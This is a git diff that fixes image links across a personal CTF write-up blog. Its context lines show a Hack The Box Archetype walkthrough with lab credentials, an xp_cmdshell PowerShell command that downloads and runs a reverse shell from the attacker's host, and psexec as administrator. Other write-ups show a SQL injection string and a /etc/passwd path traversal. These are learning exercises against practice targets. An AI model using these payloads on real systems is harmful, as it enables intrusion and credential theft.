FIX: fix links to images

_posts/2021-04-16-THM-Metasploit.md

@@ -84,7 +84,7 @@
 
 Metasploit consists of six modules:
 
-![THM%20Metasploit/module_diagram.png](THM%20Metasploit/module_diagram.png)
+![THM%20Metasploit/module_diagram.png](/images/THM%20Metasploit/module_diagram.png)
 
 *Note, this diagram includes both the interfaces and *most* of the modules. This diagram does not include the 'Post' module.*
 

_posts/2021-06-05-HTB-Archetype.md

@@ -4,39 +4,39 @@ I've been wanting to get into Hack The Box for a while now. The first machine I'
 
 The first thing we are going to do is an initial Nmap scan with the tags : `-sC` (to tell Nmap to use it's default scripts), `-sV` (to get more information about the services running on the different ports of the machine) and using `-oN` we save the scan in a file. We get the following output:
 
-![Archetype/nmap_initial.png](Archetype/nmap_initial.png)
+![Archetype/nmap_initial.png](/images/Archetype/nmap_initial.png)
 
 Okay, so we can identify this box as a Windows machine and we find out that there is a Microsoft SQL Server running on port `1433` and there is a Samba on port `445`.
 
 We also run a more aggressive (`-A`) Nmap scan on all ports (`-p-`) to get more information. The output is as following:
 
-![Archetype/nmap_all_ports_aggressive.png](Archetype/nmap_all_ports_aggressive.png)
+![Archetype/nmap_all_ports_aggressive.png](/imges/Archetype/nmap_all_ports_aggressive.png)
 
 We don't get any interesting additional information here so let's move to on to enumerating Samba.
 
 The initial nmap scan tells us that we can access Samba using the `guest` account, so we will do just that using `smbmap`. We use `-u` to specify the user and `-H` to specify the host's IP. 
 
-![Archetype\smbmap.png](Archetype/smbmap.png)
+![Archetype\smbmap.png](/images/Archetype/smbmap.png)
 
 We find out that backups and IPC$ are accessible as read only. So using smbclient we will access the both of them. First let's check out `backups`:
 
-![Archetype/smbclient_backups.png](Archetype/smbclient_backups.png)
+![Archetype/smbclient_backups.png](/images/Archetype/smbclient_backups.png)
 
 We find an interesting file here, `prod.dtsConfig`. We download it onto our machine using `get`.
 
 Now let's take a look at `IPC$`:
 
-![Archetype/smbclient_ipc.png](Archetype/smbclient_ipc.png)
+![Archetype/smbclient_ipc.png](/images/Archetype/smbclient_ipc.png)
 
 As you can see, we are unable to get any information from `IPC$` so let's take a look at `prod.dtsConfig`'s content.
 
-![Archetype/prod_dtsConfig.png](Archetype/prod_dtsConfig.png)
+![Archetype/prod_dtsConfig.png](/images/Archetype/prod_dtsConfig.png)
 
 We find creds here that look to be for the mssql server: `Archetype/sql_svc:M3g4c0rp123` (Note: the format here is `username:password`)
 
 Let's try getting in the MSSQL server using the creds we just found. We will be using an impacket script called `mssqlclient.py`. This script is already on kali linux but can be found [here](https://github.com/SecureAuthCorp/impacket/blob/master/examples/mssqlclient.py). The full command is: `python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py -windows-auth ARCHETYPE/[email protected]`.
 
-![Archetype/mssql.png](Archetype/mssql.png)
+![Archetype/mssql.png](/images/Archetype/mssql.png)
 
 Great, it worked. The first thing we are going to run is `enable_xp_cmdshell` and we will prepare a powershell reverse shell on our machine that we are going to use to access the machine.
 
@@ -49,17 +49,17 @@ We are going to host the reverse shell file using the module `http.server` in py
 
 Now we go back to mssql server and run `xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://10.10.14.217/shell.ps1\");"` to download and execute the reverse shell.
 
-![Archetype/call_revshell.png](Archetype/call_revshell.png) 
+![Archetype/call_revshell.png](/images/Archetype/call_revshell.png) 
 
 Wouhou we get a call back on our attacking machine and we have a reverse shell. Now let's enumerate the machine to find a way to escalate our privileges. 
 
 On this machine, we are able to take a look at the command history of powershell and if we run: `type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt` we get the administrator's password: `MEGACORP_4dm1n!!`.
 
-![Archetype/history_cmd.png](Archetype/history_cmd.png)
+![Archetype/history_cmd.png](/images/Archetype/history_cmd.png)
 
 Okay great now we just have to reconnect to the machine as administrator using another impacket script, `psexec.py`. We run `python3 /usr/share/doc/python3-impacket/examples/psexec.py [email protected]` and *voilà*!
 
-![Archetype/psexec.png](Archetype/psexec.png)
+![Archetype/psexec.png](/images/Archetype/psexec.png)
 
 Now we just need to get the flags!
 

_posts/2021-07-16-CTFLearn-Basic-Injection.md

@@ -12,7 +12,7 @@ So we already know that we need to use SQL Injection and looking at the challeng
 
 So let's go to this website:
 
-![Basic%20Injection/webpage.png](Basic%20Injection/webpage.png)
+![Basic%20Injection/webpage.png](/images/Basic%20Injection/webpage.png)
 
 If we enter `' or 1=1; -- -`, we are able to leak the whole database.
 

_posts/2021-07-16-RingZer0-Big-Brother-Is-Watching.md

@@ -4,7 +4,7 @@ This challenge is part of the web section of the RingZer0 CTF and can be found [
 
 The challenge page shows the following:
 
-![Big%20Bro/chall_page.png](Big%20Bro/chall_page.png)
+![Big%20Bro/chall_page.png](/images/Big%20Bro/chall_page.png)
 
 There is a reference to Google, this can make you think of Google crawlers and lead you to check the site's `robots.txt` file. In fact, *a robots.txt file is used primarily to manage crawler traffic to your site, and usually to keep a file off Google* (definition found here: [https://developers.google.com/search/docs/advanced/robots/intro](https://developers.google.com/search/docs/advanced/robots/intro)). So the `robots.txt file` could make sure that Google does not find this challenge's flag.
 

_posts/2021-07-16-RingZer0-Headache.md

@@ -6,7 +6,7 @@ This time the challenge's info page only says the following: "Answer is closer t
 
 I then decided to open Firefox's Web Developer Tools to see if there was anything more interesting there. I decided to take a look at the requests that were made in the *Network* tab:
 
-![Headache/requests.png](Headache/requests.png)
+![Headache/requests.png](/images/Headache/requests.png)
 
 We can see that one of the response's headers of the get request made to access the challenge page is `flag` and its value contains the flag!
 

_posts/2021-07-16-RingZer0-Looking-For-Password-File.md

@@ -4,15 +4,15 @@ This challenge is part of the web section of the RingZer0 CTF and can be found [
 
 On a first look, the home section of the webpage of this challenge looks pretty bland:
 
-![Password%20File/webpage.png](Password%20File/webpage.png)
+![Password%20File/webpage.png](/images/Password%20File/webpage.png)
 
 However its URL is very interesting: `http://challenges.ringzer0team.com:10075/?page=lorem.php`
 
 We can see a `page` parameter and it seems that it will display the given page. The vulnerability here is LFI (local file inclusion). We will try to display a file on the machine that we should not have access to normally (I'm guessing it's a password file if we trust the challenge's name). 
 
 I decided to test this out and passed through `flag.php` (the url now being: `http://challenges.ringzer0team.com:10075/?page=flag.php`) and I got back the following error:
 
-![Password%20File/error.png](Password%20File/error.png)
+![Password%20File/error.png](/images/Password%20File/error.png)
 
 We can see that `flag.php` does not exist, however this error also helps us verify that the website is located in `/var/www/html/`. Since the name of the challenge is "Looking for password file", we can guess that the file we are looking for is `/etc/passwd`. So we are going to the following url: `http://challenges.ringzer0team.com:10075/?page=../../../etc/passwd`.
 

_posts/2021-07-16-RingZer0-Words-Mean-Something.md

@@ -4,7 +4,7 @@ This challenge is part of the web section of the RingZer0 CTF and can be found [
 
 This challenge's page shows the following:
 
-![Words%20Mean%20Something/chall_page.png](Words%20Mean%20Something/chall_page.png)
+![Words%20Mean%20Something/chall_page.png](/images/Words%20Mean%20Something/chall_page.png)
 
 First thing I did was check the site's source page but sadly it didn't give out any flag or any interesting information. So I then took a look at Firefox's Web Developer Tools. 
 

_posts/2021-08-02-RTL.md

@@ -246,7 +246,7 @@ Where is this? was an OSINT challenge released later in the ctf worth 40 points.
 
 The image is the following:
 
-![*image from the ctf*](Where/where.PNG)
+![*image from the ctf*](/images/Where/where.PNG)
 
 
 If we zoom in on the left, we can kind of make out the words "Zum Padd", I started typing it out on my search bar and was automatically recommended Zum Paddenwirt. I checked it out on Google Maps and found there its coordinates.

_posts/2023-05-23-HeroCTF-AppointmentBook.md

@@ -64,7 +64,7 @@ free(local_28);
 
 And we can find above `appointments`, a bunch of pointers to interesting functions we can overwrite:
 
-![Possible functions we can overwrite](/_drafts/Appointment%20Book/poss_fct_overwrite.png)
+![Possible functions we can overwrite](/images/Appointment%20Book/poss_fct_overwrite.png)
 
 So what we need to do is overwrite the pointer to one of these functions so that it points to our win function, and then the next time this function is called, it will instead call our win function giving us a shell.
 
@@ -158,4 +158,10 @@ print(flag)
 io.interactive()
 ```
 
-And the flag is: `Hero{Unch3ck3d_n3g4t1v3_1nd3x_1nt0_G0T_0v3wr1t3_g03s_brrrrrr}`
+And the flag is: `Hero{Unch3ck3d_n3g4t1v3_1nd3x_1nt0_G0T_0v3wr1t3_g03s_brrrrrr}`
+
+## Contact
+
+If you have any questions or remarks don't hesitate to reach out on discord to *therokdaba#9872*.
+
+Go back to the [homepage](https://therokdaba.github.io/) of this website.